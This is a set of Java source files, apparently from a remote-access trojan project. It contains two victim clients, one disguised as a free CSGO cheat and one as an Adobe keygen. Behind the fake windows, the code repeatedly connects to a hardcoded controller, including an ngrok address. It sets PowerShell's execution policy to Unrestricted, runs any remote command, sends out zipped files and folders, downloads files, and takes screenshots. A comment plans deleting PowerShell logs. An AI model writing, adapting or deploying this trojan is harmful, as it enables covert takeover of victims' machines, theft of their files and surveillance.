--------------------------------------------------------------------------------
/Victim [CSGOHacks]/src/connection/Client.java:
--------------------------------------------------------------------------------
1 | package connection;
2 |
3 | import java.io.BufferedInputStream;
4 | import java.io.BufferedOutputStream;
5 | import java.io.DataInputStream;
6 | import java.io.DataOutputStream;
7 | import java.io.File;
8 | import java.io.FileInputStream;
9 | import java.io.FileOutputStream;
10 | import java.io.IOException;
11 | import java.io.InputStream;
12 | import java.io.OutputStream;
13 | import java.net.Socket;
14 |
15 | public class Client {
16 | private Socket s;
17 | private String _ip;
18 | private int _port;
19 | private DataOutputStream dout;
20 | private DataInputStream din;
21 |
22 | public Client(String hostIP, int port) {
23 | _ip = hostIP;
24 | _port = port;
25 | }
26 |
27 | public boolean isClosed() {
28 | return s.isClosed();
29 | }
30 |
31 | public void send(String msg) throws IOException {
32 | dout.writeUTF(msg);
33 | dout.flush();
34 | }
35 |
36 | public void sendFile(File file) throws IOException {
37 | // Auth to identify as a sender socket
38 | send(file.getName());
39 |
40 | int lenght = (int) file.length();
41 | send(String.valueOf(lenght));
42 |
43 | byte [] mybytearray = new byte [(int)file.length()];
44 |
45 | InputStream in = new FileInputStream(file);
46 | BufferedInputStream bin = new BufferedInputStream(in);
47 | OutputStream out = s.getOutputStream();
48 |
49 | bin.read(mybytearray, 0, mybytearray.length);
50 | out.write(mybytearray,0, mybytearray.length);
51 |
52 | //out.close() directly shuts down the socket
53 | out.close();
54 | in.close();
55 | bin.close();
56 | }
57 |
58 | public String receive() throws IOException {
59 | return din.readUTF();
60 | }
61 |
62 | public void receiveFile(String path) throws IOException {
63 | InputStream is;
64 | DataInputStream din;
65 | FileOutputStream out;
66 | BufferedOutputStream bos;
67 |
68 | //Auth to identify as a receiver socket
69 | send("iwtraf :(");
70 |
71 | try {
72 | is = s.getInputStream();
73 | din = new DataInputStream(is);
74 | out = new FileOutputStream(new File(path));
75 | bos = new BufferedOutputStream(out);
76 | } catch(IOException e) {
77 | send("Error: There was a problem initializing the transfer");
78 | throw e;
79 | }
80 | try {
81 | //Server sends length of file
82 | int length = Integer.valueOf(din.readUTF());
83 | byte [] mybytearray = new byte [length];
84 |
85 | send("Sending " + path + " (" + length + " bytes)");
86 |
87 | //is.read tries to read up to length, but may read less
88 | int bytesRead = is.read(mybytearray, 0, length);
89 | int current = bytesRead;
90 |
91 | while (current != length) {
92 | send(current + "/" + length);
93 | bytesRead = is.read(mybytearray, current, (length - current));
94 | if(bytesRead >= 0) {
95 | current += bytesRead;
96 | }
97 | }
98 |
99 | bos.write(mybytearray, 0 , length);
100 | bos.flush();
101 |
102 | send("Transfer completed");
103 | }catch(IOException e) {
104 | send("Error: The transfer couldn't be completed");
105 | }
106 |
107 | is.close();
108 | out.close();
109 | bos.close();
110 | }
111 |
112 | public void end() throws IOException {
113 | s.close();
114 | }
115 |
116 | public void connect() throws IOException {
117 | reset();
118 | dout.writeUTF("hello");
119 | }
120 |
121 | public void reset() throws IOException {
122 | while(!initConnection());
123 | System.gc(); //Calls the garbage collector because of the previous function
124 | dout = new DataOutputStream(s.getOutputStream());
125 | din = new DataInputStream(s.getInputStream());
126 | }
127 |
128 | private boolean initConnection() {
129 | try{
130 | s = new Socket(_ip,_port);
131 | return true;
132 | }
133 | catch(Exception err){
134 | return false;
135 | }
136 | }
137 | }
138 |
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/src/connection/Controller.java:
--------------------------------------------------------------------------------
1 | package connection;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 |
6 | import com.profesorfalken.jpowershell.PowerShell;
7 | import com.profesorfalken.jpowershell.PowerShellResponse;
8 |
9 | import commands.CommandManager;
10 |
11 | public class Controller {
12 | private PowerShell powerShell;
13 | private Client client;
14 | private String _ip;
15 | private int _port;
16 |
17 | public Controller(String ip, int port) {
18 | _ip = ip;
19 | _port = port;
20 | client = new Client(ip, port);
21 | setUpPowerShellSession();
22 | }
23 |
24 | public void run() {
25 | try {
26 | connect();
27 | } catch (IOException e) {
28 | return;
29 | }
30 | while(!client.isClosed()) {
31 | try {
32 | CommandManager.parseCommand(client.receive().trim(), this);
33 | } catch (IOException e1) {
34 | try {
35 | connect();
36 | }
37 | catch(IOException e2) {
38 | return;
39 | }
40 | }
41 | }
42 | }
43 |
44 | public String receiveMsg() throws IOException {
45 | return client.receive();
46 | }
47 |
48 | public void sendMsg(String message) {
49 | try {
50 | client.send(message);
51 | } catch (IOException e) {
52 | endConnection();
53 | }
54 | }
55 |
56 | public void receiveFile(String fileName) {
57 | Thread t = new Thread() {
58 | public void run() {
59 | try {
60 | String path = execute("Get-Location");
61 | path = path.split("\n")[3];
62 | path = path + "\\" + fileName;
63 |
64 | Client temporary = new Client(_ip, _port);
65 | temporary.reset();
66 | temporary.receiveFile(path);
67 | temporary.end();
68 | }
69 | catch(IOException e) {}
70 | }
71 | };
72 | t.start();
73 | try{t.join();} catch (InterruptedException e) {}
74 | }
75 |
76 | public void sendFile(File file) throws IOException {
77 | Thread t = new Thread() {
78 | public void run() {
79 | try {
80 | Client temporary = new Client(_ip, _port);
81 | temporary.reset();
82 | temporary.sendFile(file);
83 | temporary.end();
84 | }catch(IOException e) {}
85 | }
86 | };
87 |
88 | t.start();
89 | try {t.join();} catch (InterruptedException e) {}
90 | }
91 |
92 | public String execute(String command) {
93 | try {
94 | PowerShellResponse response = powerShell.executeCommand(command);
95 | return response.getCommandOutput();
96 | } catch (Exception e) {
97 | endConnection();
98 | return null;
99 | }
100 | }
101 |
102 | public void endConnection(){
103 | powerShell.close();
104 | try {
105 | client.end();
106 | } catch (IOException e) {} finally{
107 | //Borrar powerShell logs
108 | }
109 | }
110 |
111 | private void connect() throws IOException {
112 | client.connect();
113 | }
114 |
115 | private void setUpPowerShellSession() {
116 | powerShell = PowerShell.openSession();
117 |
118 | powerShell.executeCommand("Set-ExecutionPolicy Unrestricted -Scope Process");
119 |
120 | String path = System.getProperty("java.class.path").split(";")[0];
121 | path = path.substring(0, path.length() - 4);
122 | path = path.replace("[", "`[");
123 | path = path.replace("]", "`]");
124 | powerShell.executeCommand("cd '" + path + "'");
125 | }
126 | }
127 |
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/src/launcher/Main.java:
--------------------------------------------------------------------------------
1 | package launcher;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 | import view.MainWindow;
7 |
8 | public class Main {
9 | public static void main(String[] args) throws IOException {
10 | new MainWindow();
11 | //Controller ctrl = new Controller("0.tcp.ngrok.io", 17398);
12 | Controller ctrl = new Controller("192.168.0.162", 5123);
13 | ctrl.run();
14 | }
15 | }
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/src/view/MainWindow.java:
--------------------------------------------------------------------------------
1 | package view;
2 | import java.awt.BorderLayout;
3 | import java.awt.Color;
4 | import java.awt.Dimension;
5 | import java.awt.FlowLayout;
6 | import java.awt.Font;
7 | import java.awt.Image;
8 | import java.awt.Insets;
9 | import java.util.Random;
10 |
11 | import javax.imageio.ImageIO;
12 | import javax.swing.BorderFactory;
13 | import javax.swing.Box;
14 | import javax.swing.BoxLayout;
15 | import javax.swing.ImageIcon;
16 | import javax.swing.JButton;
17 | import javax.swing.JCheckBox;
18 | import javax.swing.JComboBox;
19 | import javax.swing.JFrame;
20 | import javax.swing.JLabel;
21 | import javax.swing.JPanel;
22 | import javax.swing.JSeparator;
23 | import javax.swing.JTextArea;
24 | import javax.swing.JTextField;
25 | import javax.swing.SwingConstants;
26 |
27 | public class MainWindow extends JFrame{
28 | public MainWindow(){
29 | super("CSGO HACKS [FREE VERSION]");
30 |
31 | JPanel mainPanel = new JPanel(new BorderLayout());
32 | mainPanel.setBackground(Color.WHITE);
33 |
34 | ImageIcon background = new ImageIcon("resources/background.jpg");
35 | Image temp = background.getImage();
36 | temp = temp.getScaledInstance(270, 342, Image.SCALE_SMOOTH);
37 | background = new ImageIcon(temp);
38 | JLabel backgroundLabel = new JLabel(background);
39 | mainPanel.add(backgroundLabel, BorderLayout.LINE_START);
40 |
41 | JPanel centerPanel = new JPanel(new BorderLayout());
42 | centerPanel.setBackground(Color.WHITE);
43 | mainPanel.add(centerPanel, BorderLayout.CENTER);
44 |
45 | centerPanel.add(Box.createRigidArea(new Dimension(10, 0)), BorderLayout.LINE_START);
46 |
47 | JPanel centerCenterPanel = new JPanel();
48 | centerCenterPanel.setLayout(new BoxLayout(centerCenterPanel, BoxLayout.Y_AXIS));
49 | centerCenterPanel.setBackground(Color.WHITE);
50 | centerPanel.add(centerCenterPanel, BorderLayout.CENTER);;
51 |
52 | ImageIcon titleImage = new ImageIcon("resources/title.png");
53 | temp = titleImage.getImage();
54 | temp = temp.getScaledInstance(223, 100, Image.SCALE_SMOOTH);
55 | titleImage = new ImageIcon(temp);
56 | JLabel titleLabel = new JLabel(titleImage);
57 | centerPanel.add(titleLabel, BorderLayout.PAGE_START);
58 |
59 | JLabel title = new JLabel("Game hacks for Counter Strike Global Offensive [UNDETECTED]");
60 | title.setFont(new Font(null, Font.BOLD, 20));
61 | centerCenterPanel.add(title);
62 |
63 | centerCenterPanel.add(Box.createRigidArea(new Dimension(0, 10)));
64 | JLabel howTo = new JLabel("Select the hacks you want before initializing the game:");
65 | centerCenterPanel.add(howTo);
66 |
67 | JCheckBox aimbot = new JCheckBox("Aimbot");
68 | JCheckBox wallhack = new JCheckBox("Wallhack");
69 | JCheckBox autoheadshot = new JCheckBox("Autoheadshot");
70 | aimbot.setBackground(Color.WHITE);
71 | wallhack.setBackground(Color.WHITE);
72 | autoheadshot.setBackground(Color.WHITE);
73 | aimbot.setAlignmentX(LEFT_ALIGNMENT);
74 | wallhack.setAlignmentX(LEFT_ALIGNMENT);
75 | autoheadshot.setAlignmentX(LEFT_ALIGNMENT);
76 | centerCenterPanel.add(Box.createRigidArea(new Dimension(0, 10)));
77 | centerCenterPanel.add(aimbot);
78 | centerCenterPanel.add(Box.createRigidArea(new Dimension(0, 10)));
79 | centerCenterPanel.add(wallhack);
80 | centerCenterPanel.add(Box.createRigidArea(new Dimension(0, 10)));
81 | centerCenterPanel.add(autoheadshot);
82 |
83 | this.setSize(620, 380);
84 | this.setContentPane(mainPanel);
85 | this.setVisible(true);
86 | this.setResizable(false);
87 | this.setLocationRelativeTo(null);
88 | }
89 | }
90 |
--------------------------------------------------------------------------------
/Victim [KeyGen]/lib/commons-io-2.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [KeyGen]/lib/commons-io-2.6.jar
--------------------------------------------------------------------------------
/Victim [KeyGen]/lib/jPowerShell-3.1.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [KeyGen]/lib/jPowerShell-3.1.1.jar
--------------------------------------------------------------------------------
/Victim [KeyGen]/resources/adobePremier.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [KeyGen]/resources/adobePremier.png
--------------------------------------------------------------------------------
/Victim [KeyGen]/resources/afterEffects.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [KeyGen]/resources/afterEffects.png
--------------------------------------------------------------------------------
/Victim [KeyGen]/resources/illustrator.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [KeyGen]/resources/illustrator.png
--------------------------------------------------------------------------------
/Victim [KeyGen]/resources/inDesign.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [KeyGen]/resources/inDesign.png
--------------------------------------------------------------------------------
/Victim [KeyGen]/resources/lightRoom.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [KeyGen]/resources/lightRoom.png
--------------------------------------------------------------------------------
/Victim [KeyGen]/resources/photoShop.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [KeyGen]/resources/photoShop.png
--------------------------------------------------------------------------------
/Victim [KeyGen]/src/commands/Command.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public abstract class Command {
8 | protected String _commandName;
9 |
10 | public Command(String commandName) {
11 | _commandName = commandName;
12 | }
13 |
14 | public abstract void execute(Controller ctrl) throws IOException;
15 |
16 | protected boolean parse(String command) {
17 | return _commandName.equals(command);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/Victim [KeyGen]/src/commands/CommandManager.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public class CommandManager {
8 | private static Command[] commands = {new EndCommand(), new GetCommand(), new SendCommand(), new ScreenShotCommand()};
9 |
10 | public static void parseCommand(String command, Controller ctrl) throws IOException {
11 | boolean parsed = false;
12 | int i = 0;
13 |
14 | while(!parsed && i < commands.length) {
15 | try {
16 | if(commands[i].parse(command)) {
17 | commands[i].execute(ctrl);
18 | parsed = true;
19 | }
20 | }catch(IllegalArgumentException e) {
21 | ctrl.sendMsg("Please, input a valid command >:(\nType help for more info");
22 | parsed = true;
23 | }
24 | i++;
25 | }
26 | if(!parsed) {
27 | ctrl.sendMsg(ctrl.execute(command));
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/Victim [KeyGen]/src/commands/EndCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public class EndCommand extends Command{
8 |
9 | public EndCommand() {
10 | super("endcon");
11 | }
12 |
13 | @Override
14 | public void execute(Controller ctrl) throws IOException {
15 | ctrl.sendMsg("Bye :(\n\n");
16 | ctrl.endConnection();
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/Victim [KeyGen]/src/commands/GetCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.File;
4 | import java.io.FileInputStream;
5 | import java.io.FileOutputStream;
6 | import java.io.IOException;
7 | import java.util.ArrayList;
8 | import java.util.List;
9 | import java.util.zip.ZipEntry;
10 | import java.util.zip.ZipException;
11 | import java.util.zip.ZipOutputStream;
12 |
13 | import connection.Controller;
14 |
15 | public class GetCommand extends Command{
16 | private String _fileName;
17 | private List fileList;
18 |
19 | public GetCommand() {
20 | super("get");
21 | fileList = new ArrayList();
22 | }
23 |
24 | protected boolean parse(String command) {
25 | boolean ok = false;
26 |
27 | if(command.contains(_commandName)) {
28 | try {
29 | _fileName = command.split("\"")[1];
30 | }catch(Exception e) {
31 | throw new IllegalArgumentException();
32 | }
33 | ok = true;
34 | }
35 |
36 | return ok;
37 | }
38 |
39 | @Override
40 | public void execute(Controller ctrl) throws IOException {
41 | String path = ctrl.execute("Get-Item '" + _fileName + "' | Select-Object FullName | Format-List");
42 |
43 | File fileToCompress = new File(fetch(path));
44 | if(fileToCompress.exists()) {
45 | File fileCompressed = compress(fileToCompress, ctrl);
46 | if(fileCompressed.exists()) {
47 | ctrl.sendFile(fileCompressed);
48 | fileCompressed.delete();
49 | }
50 | } else {
51 | ctrl.sendMsg("The specified file/dir does not exists");
52 | }
53 | }
54 |
55 | private File compress(File fileToCompress, Controller ctrl){
56 | byte[] buffer = new byte[1024];
57 |
58 | try{
59 | String path = fileToCompress.getAbsolutePath();
60 | String zipPath = path + ".zip";
61 |
62 | FileOutputStream fos = new FileOutputStream(zipPath);
63 | ZipOutputStream zos = new ZipOutputStream(fos);
64 |
65 | if(fileToCompress.isFile()) {
66 | ZipEntry ze= new ZipEntry(_fileName);
67 | zos.putNextEntry(ze);
68 | FileInputStream in = new FileInputStream(path);
69 |
70 | int len;
71 | while ((len = in.read(buffer)) > 0) {
72 | zos.write(buffer, 0, len);
73 | }
74 |
75 | in.close();
76 |
77 | }
78 | else {
79 | generateFileList(fileToCompress);
80 |
81 | for(File file : fileList){
82 | try {
83 | ZipEntry ze= new ZipEntry(file.getName());
84 | zos.putNextEntry(ze);
85 | FileInputStream in = new FileInputStream(file.getAbsolutePath());
86 |
87 | int len;
88 | while ((len = in.read(buffer)) > 0) {
89 | zos.write(buffer, 0, len);
90 | }
91 | in.close();
92 | }catch(ZipException ex){
93 | //weird zip format exception when compressing some xml files
94 | }
95 | }
96 | }
97 | zos.closeEntry();
98 | zos.close();
99 | fos.close();
100 | ctrl.sendMsg("File compressed");
101 |
102 | return new File(zipPath);
103 | }catch(Exception e) {
104 | ctrl.sendMsg(e.getStackTrace().toString() + " " + e.getMessage());
105 | return null;
106 | }
107 | }
108 |
109 | private void generateFileList(File node){
110 | //add file only
111 | if(node.isFile()){
112 | fileList.add(node);
113 | }
114 | else if(node.isDirectory()){
115 | String[] subNote = node.list();
116 | for(String filename : subNote){
117 | generateFileList(new File(node, filename));
118 | }
119 | }
120 | }
121 |
122 | private static String fetch(String str) {
123 | boolean exit = false;
124 | int first = 0, i = 0;
125 |
126 | exit = false;
127 | while(i < str.length() && !exit) {
128 | char aux = str.charAt(i);
129 | if(aux == ':') {
130 | first = i;
131 | exit = true;
132 | }
133 | i++;
134 | }
135 |
136 | return str.substring(first + 2, str.length());
137 | }
138 |
139 | }
140 |
--------------------------------------------------------------------------------
/Victim [KeyGen]/src/commands/ScreenShotCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 |
6 | import connection.Controller;
7 |
8 | public class ScreenShotCommand extends Command{
9 |
10 | public ScreenShotCommand() {
11 | super("screenshot");
12 | }
13 |
14 | @Override
15 | public void execute(Controller ctrl) throws IOException {
16 | // Current PowerShell script does not work properly :(
17 | ctrl.receiveFile("Take-ScreenShot.ps1");
18 | ctrl.execute(". .\\Take-ScreenShot.ps1");
19 | String path = ctrl.execute("Get-Location");
20 | path = path.split("\n")[3];
21 | path = path + "\\";
22 | path = path.replace("[", "`[");
23 | path = path.replace("]", "`]");
24 | ctrl.execute("Take-ScreenShot -file \"" + path + "screenshot.png\"");
25 | ctrl.sendMsg("Screenshot taken");
26 | File screenshot = new File("screenshot.png");
27 | ctrl.sendFile(screenshot);
28 | ctrl.execute("rm screenshot.png");
29 | }
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/Victim [KeyGen]/src/commands/SendCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public class SendCommand extends Command{
8 | private String _fileName;
9 |
10 | public SendCommand() {
11 | super("send");
12 | }
13 |
14 | protected boolean parse(String command) {
15 | boolean ok = false;
16 |
17 | if(command.contains(_commandName)) {
18 | try {
19 | _fileName = command.split("\"")[1];
20 | }catch(Exception e) {
21 | throw new IllegalArgumentException();
22 | }
23 | ok = true;
24 | }
25 |
26 | return ok;
27 | }
28 |
29 | @Override
30 | public void execute(Controller ctrl) throws IOException {
31 | ctrl.receiveFile(_fileName);
32 | }
33 |
34 | }
35 |
--------------------------------------------------------------------------------
/Victim [KeyGen]/src/connection/Client.java:
--------------------------------------------------------------------------------
1 | package connection;
2 |
3 | import java.io.BufferedInputStream;
4 | import java.io.BufferedOutputStream;
5 | import java.io.DataInputStream;
6 | import java.io.DataOutputStream;
7 | import java.io.File;
8 | import java.io.FileInputStream;
9 | import java.io.FileOutputStream;
10 | import java.io.IOException;
11 | import java.io.InputStream;
12 | import java.io.OutputStream;
13 | import java.net.Socket;
14 |
15 | public class Client {
16 | private Socket s;
17 | private String _ip;
18 | private int _port;
19 | private DataOutputStream dout;
20 | private DataInputStream din;
21 |
22 | public Client(String hostIP, int port) {
23 | _ip = hostIP;
24 | _port = port;
25 | }
26 |
27 | public boolean isClosed() {
28 | return s.isClosed();
29 | }
30 |
31 | public void send(String msg) throws IOException {
32 | dout.writeUTF(msg);
33 | dout.flush();
34 | }
35 |
36 | public void sendFile(File file) throws IOException {
37 | // Auth to identify as a sender socket
38 | send(file.getName());
39 |
40 | int lenght = (int) file.length();
41 | send(String.valueOf(lenght));
42 |
43 | byte [] mybytearray = new byte [(int)file.length()];
44 |
45 | InputStream in = new FileInputStream(file);
46 | BufferedInputStream bin = new BufferedInputStream(in);
47 | OutputStream out = s.getOutputStream();
48 |
49 | bin.read(mybytearray, 0, mybytearray.length);
50 | out.write(mybytearray,0, mybytearray.length);
51 |
52 | //out.close() directly shuts down the socket
53 | out.close();
54 | in.close();
55 | bin.close();
56 | }
57 |
58 | public String receive() throws IOException {
59 | return din.readUTF();
60 | }
61 |
62 | public void receiveFile(String path) throws IOException {
63 | InputStream is;
64 | DataInputStream din;
65 | FileOutputStream out;
66 | BufferedOutputStream bos;
67 |
68 | //Auth to identify as a receiver socket
69 | send("iwtraf :(");
70 |
71 | try {
72 | is = s.getInputStream();
73 | din = new DataInputStream(is);
74 | out = new FileOutputStream(new File(path));
75 | bos = new BufferedOutputStream(out);
76 | } catch(IOException e) {
77 | send("Error: There was a problem initializing the transfer");
78 | throw e;
79 | }
80 | try {
81 | //Server sends length of file
82 | int length = Integer.valueOf(din.readUTF());
83 | byte [] mybytearray = new byte [length];
84 |
85 | send("Sending " + path + " (" + length + " bytes)");
86 |
87 | //is.read tries to read up to length, but may read less
88 | int bytesRead = is.read(mybytearray, 0, length);
89 | int current = bytesRead;
90 |
91 | while (current != length) {
92 | send(current + "/" + length);
93 | bytesRead = is.read(mybytearray, current, (length - current));
94 | if(bytesRead >= 0) {
95 | current += bytesRead;
96 | }
97 | }
98 |
99 | bos.write(mybytearray, 0 , length);
100 | bos.flush();
101 |
102 | send("Transfer completed");
103 | }catch(IOException e) {
104 | send("Error: The transfer couldn't be completed");
105 | }
106 |
107 | is.close();
108 | out.close();
109 | bos.close();
110 | }
111 |
112 | public void end() throws IOException {
113 | s.close();
114 | }
115 |
116 | public void connect() throws IOException {
117 | reset();
118 | dout.writeUTF("hello");
119 | }
120 |
121 | public void reset() throws IOException {
122 | while(!initConnection());
123 | System.gc(); //Calls the garbage collector because of the previous function
124 | dout = new DataOutputStream(s.getOutputStream());
125 | din = new DataInputStream(s.getInputStream());
126 | }
127 |
128 | private boolean initConnection() {
129 | try{
130 | s = new Socket(_ip,_port);
131 | return true;
132 | }
133 | catch(Exception err){
134 | return false;
135 | }
136 | }
137 | }
138 |
--------------------------------------------------------------------------------
/Victim [KeyGen]/src/connection/Controller.java:
--------------------------------------------------------------------------------
1 | package connection;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 |
6 | import com.profesorfalken.jpowershell.PowerShell;
7 | import com.profesorfalken.jpowershell.PowerShellResponse;
8 |
9 | import commands.CommandManager;
10 |
11 | public class Controller {
12 | private PowerShell powerShell;
13 | private Client client;
14 | private String _ip;
15 | private int _port;
16 |
17 | public Controller(String ip, int port) {
18 | _ip = ip;
19 | _port = port;
20 | client = new Client(ip, port);
21 | setUpPowerShellSession();
22 | }
23 |
24 | public void run() {
25 | try {
26 | connect();
27 | } catch (IOException e) {
28 | return;
29 | }
30 | while(!client.isClosed()) {
31 | try {
32 | CommandManager.parseCommand(client.receive().trim(), this);
33 | } catch (IOException e1) {
34 | try {
35 | connect();
36 | }
37 | catch(IOException e2) {
38 | return;
39 | }
40 | }
41 | }
42 | }
43 |
44 | public String receiveMsg() throws IOException {
45 | return client.receive();
46 | }
47 |
48 | public void sendMsg(String message) {
49 | try {
50 | client.send(message);
51 | } catch (IOException e) {
52 | endConnection();
53 | }
54 | }
55 |
56 | public void receiveFile(String fileName) {
57 | Thread t = new Thread() {
58 | public void run() {
59 | try {
60 | String path = execute("Get-Location");
61 | path = path.split("\n")[3];
62 | path = path + "\\" + fileName;
63 |
64 | Client temporary = new Client(_ip, _port);
65 | temporary.reset();
66 | temporary.receiveFile(path);
67 | temporary.end();
68 | }
69 | catch(IOException e) {}
70 | }
71 | };
72 | t.start();
73 | try{t.join();} catch (InterruptedException e) {}
74 | }
75 |
76 | public void sendFile(File file) throws IOException {
77 | Thread t = new Thread() {
78 | public void run() {
79 | try {
80 | Client temporary = new Client(_ip, _port);
81 | temporary.reset();
82 | temporary.sendFile(file);
83 | temporary.end();
84 | }catch(IOException e) {}
85 | }
86 | };
87 |
88 | t.start();
89 | try {t.join();} catch (InterruptedException e) {}
90 | }
91 |
92 | public String execute(String command) {
93 | try {
94 | PowerShellResponse response = powerShell.executeCommand(command);
95 | return response.getCommandOutput();
96 | } catch (Exception e) {
97 | endConnection();
98 | return null;
99 | }
100 | }
101 |
102 | public void endConnection(){
103 | powerShell.close();
104 | try {
105 | client.end();
106 | } catch (IOException e) {} finally{
107 | //Borrar powerShell logs
108 | }
109 | }
110 |
111 | private void connect() throws IOException {
112 | client.connect();
113 | }
114 |
115 | private void setUpPowerShellSession() {
116 | powerShell = PowerShell.openSession();
117 |
118 | powerShell.executeCommand("Set-ExecutionPolicy Unrestricted -Scope Process");
119 |
120 | String path = System.getProperty("java.class.path").split(";")[0];
121 | path = path.substring(0, path.length() - 4);
122 | path = path.replace("[", "`[");
123 | path = path.replace("]", "`]");
124 | powerShell.executeCommand("cd '" + path + "'");
125 | }
126 | }
127 |
--------------------------------------------------------------------------------
/Victim [KeyGen]/src/launcher/Main.java:
--------------------------------------------------------------------------------
1 | package launcher;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 | import view.MainWindow;
7 |
8 | public class Main {
9 | public static void main(String[] args) throws IOException {
10 | new MainWindow();
11 | Controller ctrl = new Controller("0.tcp.ngrok.io", 19663);
12 | //Controller ctrl = new Controller("192.168.0.159", 5123);
13 | ctrl.run();
14 | }
15 | }
--------------------------------------------------------------------------------
/Victim [KeyGen]/src/view/MainWindow.java:
--------------------------------------------------------------------------------
1 | package view;
2 | import java.awt.BorderLayout;
3 | import java.awt.Color;
4 | import java.awt.Dimension;
5 | import java.awt.Font;
6 | import java.awt.Image;
7 | import java.awt.Insets;
8 | import java.util.Random;
9 |
10 | import javax.swing.BorderFactory;
11 | import javax.swing.Box;
12 | import javax.swing.BoxLayout;
13 | import javax.swing.ImageIcon;
14 | import javax.swing.JButton;
15 | import javax.swing.JComboBox;
16 | import javax.swing.JFrame;
17 | import javax.swing.JLabel;
18 | import javax.swing.JPanel;
19 | import javax.swing.JSeparator;
20 | import javax.swing.JTextArea;
21 | import javax.swing.JTextField;
22 | import javax.swing.SwingConstants;
23 |
24 | public class MainWindow extends JFrame{
25 | private JTextArea key;
26 | private JLabel icon;
27 | private String[] progList = {"Photoshop", "Lightroom Classic", "Illustrator", "InDesign", "Premiere Pro", "After Effects"};
28 |
29 | public MainWindow(){
30 | super("Key Generator for Adobe Suite");
31 |
32 | JPanel mainPanel = new JPanel(new BorderLayout());
33 |
34 | JPanel centerPanel = new JPanel();
35 | centerPanel.setBackground(Color.WHITE);
36 | mainPanel.add(centerPanel, BorderLayout.CENTER);
37 |
38 | JPanel centerSuperior = new JPanel();
39 | centerSuperior.setBackground(Color.WHITE);
40 | centerPanel.add(centerSuperior);
41 |
42 | icon = new JLabel(new ImageIcon("resources/photoShop.png"));
43 | centerSuperior.add(icon);
44 |
45 | JComboBox progSelect = new JComboBox(progList);
46 | progSelect.addActionListener((e) -> {
47 | JComboBox cb = (JComboBox)e.getSource();
48 | String prog = (String)cb.getSelectedItem();
49 | if(prog.equals(progList[0])) {
50 | icon.setIcon(new ImageIcon("resources/photoShop.png"));
51 | }
52 | else if (prog.equals(progList[1])){
53 | icon.setIcon(new ImageIcon("resources/lightRoom.png"));
54 | }
55 | else if (prog.equals(progList[2])){
56 | icon.setIcon(new ImageIcon("resources/illustrator.png"));
57 | }
58 | else if (prog.equals(progList[3])){
59 | icon.setIcon(new ImageIcon("resources/inDesign.png"));
60 | }
61 | else if (prog.equals(progList[4])){
62 | icon.setIcon(new ImageIcon("resources/adobePremier.png"));
63 | }
64 | else if (prog.equals(progList[5])) {
65 | icon.setIcon(new ImageIcon("resources/afterEffects.png"));
66 | }
67 | });
68 | centerSuperior.add(progSelect);
69 |
70 | JPanel centerCenter = new JPanel();
71 | centerCenter.setBackground(Color.WHITE);
72 | centerPanel.add(centerCenter);
73 |
74 | JButton generateButton = new JButton("Generate key");
75 | generateButton.addActionListener((e) ->{
76 | key.setText(generateCode());
77 | });
78 | centerCenter.add(generateButton);
79 |
80 | JLabel keyLabel = new JLabel("Key: ");
81 | centerCenter.add(keyLabel);
82 |
83 | key = new JTextArea();
84 | key.setBorder(BorderFactory.createLineBorder(Color.black, 1));
85 | key.setEditable(false);
86 | key.setPreferredSize(new Dimension(200, 20));
87 | key.setMaximumSize(new Dimension(200, 20));
88 | key.setMinimumSize(new Dimension(200, 20));
89 | centerCenter.add(key);
90 |
91 | JPanel centerInferior = new JPanel(new BorderLayout());
92 | centerInferior.setBackground(Color.WHITE);
93 | centerPanel.add(centerInferior);
94 |
95 | JLabel howToUse = new JLabel("In order to generate the key correctly, open the program you want to generate the key for, select it in the menu and press generate key. Otherwhise, the key won't work. Thanks for downloading and enjoy.");
96 | howToUse.setFont(new Font(null, Font.PLAIN, 12));
97 | howToUse.setPreferredSize(new Dimension(360, 100));
98 | howToUse.setMaximumSize(new Dimension(360, 100));
99 | howToUse.setMinimumSize(new Dimension(360, 100));
100 | centerInferior.add(howToUse);
101 |
102 | JPanel versionPanel = new JPanel();
103 | versionPanel.setLayout(new BoxLayout(versionPanel, BoxLayout.X_AXIS));
